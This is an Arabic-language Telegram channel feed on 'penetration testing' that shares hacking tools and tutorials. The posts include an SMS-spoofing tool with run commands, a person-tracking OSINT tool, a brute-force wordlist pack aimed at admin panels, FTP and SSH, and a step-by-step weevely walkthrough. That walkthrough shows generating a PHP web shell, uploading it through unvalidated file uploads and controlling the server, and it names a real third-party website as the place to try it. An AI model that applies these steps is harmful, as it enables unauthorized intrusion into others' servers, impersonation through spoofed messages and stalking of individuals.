ERROR 404 BULLET MHS
Video
🎲 - شرح اختراق المواقع المصابه بثغرة Sql Injection يدوياً

🔰 - صاحب الشرح :
@Mastr48
ERROR 404 BULLET MHS
@Penetration_TestingAr.pdf
- كتاب يتحدث عن UX باللغه العربيه وعدد صفحاته 150 صفحه تقريبا
ما رأيك "بالمحتوى" الذي اقوم بتقديمه ؟
Anonymous Poll
66%
ممتاز
21%
جيد
13%
سيء
⭕️ - موقع Hacker Target :

🔒 - هذا الموقع يفيدك في اختبار اختراق تطبيقات الويب بشتى انواعها مهما كانت Wordprees او Jommla ايضا هو يستخدم ادوات مثل Nmap و Zmap و Nikto ويعطيك النتائج بسرعه فائقه يمكنكم تجربة مزاياه عبر الرابط التالي :

📎 - hackertarget.com

🎲 - للمزيد إنضم إلينا هنا :

@Penetration_TestingAr

بالتوفيق 🌹
🔬 - أداة UserRecon :

🔍 - هي أداة مفيده في جمع المعلومات عن شخص معين في اكثر من 70 من مواقع التواصل الاجتماعي وتتفقد اذا كان ذلك الشخص يستخدمها ام لا وايضا هي مفتوحة المصدر مبرمجه بلغة Bash رابط الاداه :

🔒 - https://github.com/X-HACKRAWI/UserRecon

⭕️ - مطور الاداه :
@Hackrawi
ERROR 404 BULLET MHS
@Penetration_TestingAr Linux.pdf
🔒 - كتاب [ الإدارة المتقدمة لنظام لينكس ] هذا الكتاب من اقوى الكتب التي اقراها حالياً واقوى كتاب رايته عن إدارة النظام احببت مشاركتكم به

📄 - عدد الصفحات : 614

- اللغة : العربيه هو مترجم من إحدى الكتب الانجليزيه بترجمه ممتازه جداً

🎲 - للمزيد إنضم هنا :

@Penetration_TestingAr
- Tine eye :

موقع يستخدمه خبراء البحث الجنائي والصفحات الباحثه عن حقيقة مصدر الصوره او الفيديو بالبحث عن مصدره الاصلي وبدون تصديق اي اشاعه :
🎲 - tineye.com
ERROR 404 BULLET MHS
Wireshark-Cheat-Sheet.pdf
🎲 - ملف PDF يشرح اداة Wiresharck باللغة الانجليزيه
- أداة FreeSms :

أداة مفتوحة المصدر مطورة بلغة python يمكنكم من خلالها إرسال رسائل إلى الرقم الذي تريدونه وبالنص الذي تريدوه وبكل سهوله !

🛠 - الاوامر :
$ git clone https://github.com/X-HACKRAWI/FreeSms
$ cd FreeSms
$ python fakesms.py

قم بإدخال الرقم الذي تريده مع مفتاح الدوله بهذا الشكل :
967771651321
ثم ادخل النص الذي تريده !
ستصل بإسم Info فقط !

🛡 - مطور الأداة :
@HackRawi
ERROR 404 BULLET MHS
@Penetration_TestingAr.apk
🎲 - تطبيق Linux Commands:

🌐 - تطبيق يستعرض لك " جل " هذا إن لم يكن "كل" الاوامر المخصصه لـ Linux كما انه مقسم إلى عدة اقسام ومنها
قسم للتحكم بالنظام وقسم للمستخدمين والمجموعات وقسم للشبكات وقسم للبحث وقسم لادوات اختبار الاختراق وغيرها من الاقسام

كما انه يعلمك اسرار ممتعه في لينكس مثل !! و * و ?

اتمنى ان ينال اعجابكم
🎲 - من افضل الملفات التي قد تراها من اجل التخمين على لوحات الادمن في المواقع مثل Cpanel او WordPress وغيرها

🔧 - او بعض البروتوكولات مثل FTP و SSH

🗂 - فهو يحتوي على اكثر من 40 ملف كل ملف خاص بشيء معين واستخدامها سهل جدا !

كلمة السر الخاصه بالملف :
🔐 - BULLETMHS

⭕️ - الملف ماخوذ من Github رايته رائع فشاركته معكم 🦦

للمزيد إنضم إلينا على التيليجرام عبر الرابط التالي :

- https://www.tg-me.com/Penetration_TestingAr
🎲 - اداة weevely :

⭕️ - اداة مخصصة لاختبار اختراق المواقع فهي تقوم برفع Shell على الموقع والتحكم به وكما انها سهلة الاستخدام سنقوم بشرحها عملياً على احد المواقع من انشاء ملف Shell حتى التحكم بالموقع

[+] - كما ان الاداة تسمح لنا بجلب قواعد بيانات Sql ورفع ملفات او سحب ملفات وغيرها.

[-] - اولاً يمكنكم تحميل الاداة بهذه الطريقه فقط قم بكتابة ما بعد [ # ]

bullet@mhs:~# git clone https://github.com/epinna/weevely3

🖱 - بعد ان قمنا بتحميلها نقوم بالدخول إلى ملف الاداة
bullet@mhs:~# cd weevely3/

🗜 - سنرى العديد من الملفات ما يهمنا هو ملفين فقط وهم
1- requirements.txt
2- weevely.py

ويمكنك قراءه ال Reademe ايضا لا احد سيقوم بمنعك يا عزيزي

📡 - الملف الاول فيه اسماء المكاتب التي قد تكون غير مثبته على النظام الذي تستخدمه ولكي لا تواجهك اي مشاكل فقط قم بكتابة

bullet@mhs:~# pip install -r requirements.txt

💡- الان حان وقت انشاء الملف الخبيث او الجيد من نضرك !

نقوم بكتابة :

bullet@mhs:~# python weevely.py generate bullet#123|mhs $HOME/mhs.php

مالذي مكتوب في الاعلى ?

اولا قمنا بتشغيل الاداه عبر python وبعدها ملف الاداة ثم قمت باستخدام الخيار
generate
وهو احد الخيارات في الاداة للانشاء ثم بعدها قمت بعمل كلمة سر الا وهي

bullet#123|mhs
ما فائده كلمة السر ?
وكيف استخدمها ?
لا تستعجل ساخبرك حينما نصل يا عزيزي !

ثم بعدها قمت باختيار المسار الذي سينحفظ فيه الملف وهو
$HOME/mhs.php

الان نقوم برفع الملف على بعض المواقع التي لا تقوم بالتحقق من محتوى الملفات

يمكنك التجربه على هذا الموقع والذي سارفق صور بالاسفل توضح بعض المفاهيم في الشرح :

www.codesoft.sd

الان وبعد ان قمنا بتجهيز الملف ورفعه نقوم بجلب مسار الملف بعد ان تم رفعه وهناك العديد من الطرق اولا اما الموقع بنفسه سيقوم باظهار المسار او قم بالدخول إلى ملف Uploads الذي قد يعتبره المطور لا ضرر باضهاره وانت قم بالبحث عن اسم ملفك بينهم
وبعد ان تقوم بجلب المسار مع اسم الموقع نقوم بفتح التيرمنال وكتابة :

ِbullet@mhs:~# python weevely.py www.codesoft.sd/mhs.php bullet#123|mhs

بعد ان قمنا بتشغيل الاداه قمنا بنفس السطر بعمل المسار الذي يتواجد فيه الملف الخاص بنا ثم مسافة ثم كلمة السر الخاصه بنا فتخيل اذا كان بدون كلمة سر هل من الجيد ان ياتي شخص اخر ويقوم بسرقة مجهودك ?

بعدها سيقوم بفتح جلسة مع الموقع مع اظهار
weevely>

يمكنك كتابة help لاستعراض الاوامر

🎲 - إذا كنت ترى خطا مني او بشيء ناقص قم بكتابته في التعليقات

🔓 - للمزيد انضم على قناتنا :

- https://www.tg-me.com/Penetration_TestingAr
توضيح لانشاء الملف وحتى التحكم بالسيرفر
2024/05/03 02:31:15
Back to Top
HTML Embed Code: